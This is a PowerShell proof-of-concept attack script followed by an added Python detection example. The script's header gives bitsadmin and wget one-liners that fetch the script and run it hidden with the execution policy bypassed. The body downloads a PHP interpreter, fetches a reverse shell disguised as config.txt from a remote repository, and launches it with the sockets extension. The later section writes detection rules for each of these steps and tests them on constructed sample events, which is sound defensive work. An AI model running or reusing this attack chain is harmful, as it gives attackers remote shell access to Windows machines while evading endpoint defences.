byosi.ps1
<#
BYOSI POC - Changed the interpreter, the environment variables, arguments, and made a new php shell.
Tested against a default installation of Windows 10 updated, and Windows 10/11 with EDR running.
Method 1
bitsadmin /transfer myDownloadJob /download /priority high https://raw.githubusercontent.com/fuzzlove/byosi/refs/heads/main/byosi.ps1 %temp%\myscript.ps1 & powershell -exec bypass -nop -w hidden -file %temp%\myscript.ps1
Method 2
wget https://raw.githubusercontent.com/fuzzlove/byosi/refs/heads/main/byosi.ps1 -o byosipoc.ps1;./byosipoc.ps1
#>
# Download our php interpreter
wget https://windows.php.net/downloads/releases/php-8.0.30-nts-Win32-vs16-x86.zip -O $Env:temp\\php.zip
# Extract from %TEMP%\php.zip to C:\php (default path)
Expand-Archive -Path $Env:temp\php.zip -DestinationPath C:\php
# Download our reverse shell
wget https://raw.githubusercontent.com/fuzzlove/byosi/refs/heads/main/php.txt -O C:\\php\\config.txt
# Run php with the sockets extension required by the reverse shell
& "C:\php\php.exe" @('-d extension=sockets') @('C:\php\config.txt')
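The script above leaves a distinctive trail in process-creation telemetry: a bitsadmin transfer that lands a .ps1 in a temp directory, a hidden PowerShell run with the execution policy bypassed, a PHP interpreter launched from a path outside Program Files, and a command-line `-d extension=sockets` pointed at a non-.php file. The following is an added detection example written for this page, not part of the byosi repository; the event records are constructed Sysmon-style samples, and the rule names, the `WATCHED_INTERPRETERS` set and the allowed-prefix list are assumptions a defender would tune for their own estate.

```python
import re
from typing import Dict, List

# Constructed sample process-creation records (Sysmon Event ID 1 shape). Not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer myDownloadJob /download /priority high "
                    r"https://example.invalid/byosi.ps1 C:\Users\u\AppData\Local\Temp\myscript.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -exec bypass -nop -w hidden -file C:\Users\u\AppData\Local\Temp\myscript.ps1"},
    {"Image": r"C:\php\php.exe",
     "CommandLine": r'"C:\php\php.exe" -d extension=sockets C:\php\config.txt'},
    {"Image": r"C:\Program Files\PHP\php.exe",
     "CommandLine": r'"C:\Program Files\PHP\php.exe" -v'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\u\notes.txt"},
]

# Assumed tuning knobs: interpreters we care about and where we expect them to live.
WATCHED_INTERPRETERS = {"php.exe"}
ALLOWED_INTERPRETER_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\")

URL_RE = re.compile(r"https?://\S+")
PS1_DEST_RE = re.compile(r"\S+\.ps1\b")
EP_BYPASS_RE = re.compile(r"-(?:exec|ep|executionpolicy)\s+bypass")
HIDDEN_RE = re.compile(r"-(?:w|windowstyle)\s+hidden")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rules_for(event: Dict[str, str]) -> List[str]:
    """Return the names of every detection rule that matches one process-creation event."""
    image = event.get("Image", "")
    low = event.get("CommandLine", "").lower()
    base = _basename(image)
    hits: List[str] = []

    # bitsadmin used to fetch a remote URL into a .ps1 destination (Method 1 of the POC header).
    if base == "bitsadmin.exe" and "/transfer" in low and URL_RE.search(low) and PS1_DEST_RE.search(low):
        hits.append("bitsadmin_script_download")

    # Hidden window plus execution-policy bypass on the same PowerShell command line.
    if base in ("powershell.exe", "pwsh.exe") and EP_BYPASS_RE.search(low) and HIDDEN_RE.search(low):
        hits.append("powershell_hidden_bypass")

    if base in WATCHED_INTERPRETERS:
        # Interpreter binary executing from a directory the organisation did not install it to.
        if not image.lower().startswith(ALLOWED_INTERPRETER_PREFIXES):
            hits.append("interpreter_outside_program_files")
        # Sockets extension enabled on the command line: needed for a network-capable script.
        if "extension=sockets" in low:
            hits.append("php_sockets_extension_on_cli")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run every rule over every event and return one finding per (event, rule) pair."""
    findings: List[Dict[str, str]] = []
    for idx, ev in enumerate(events):
        for rule in rules_for(ev):
            findings.append({"event": str(idx), "rule": rule, "image": ev.get("Image", "")})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f['event']}: {f['rule']} ({f['image']})")
```

Correlating the four rules on one host within a short window is what turns individual low-confidence hits into a BYOSI alert; any single rule on its own (a developer running PHP from a scratch folder, say) will produce benign matches, so the prefix list and interpreter set should be adjusted to the environment before deploying.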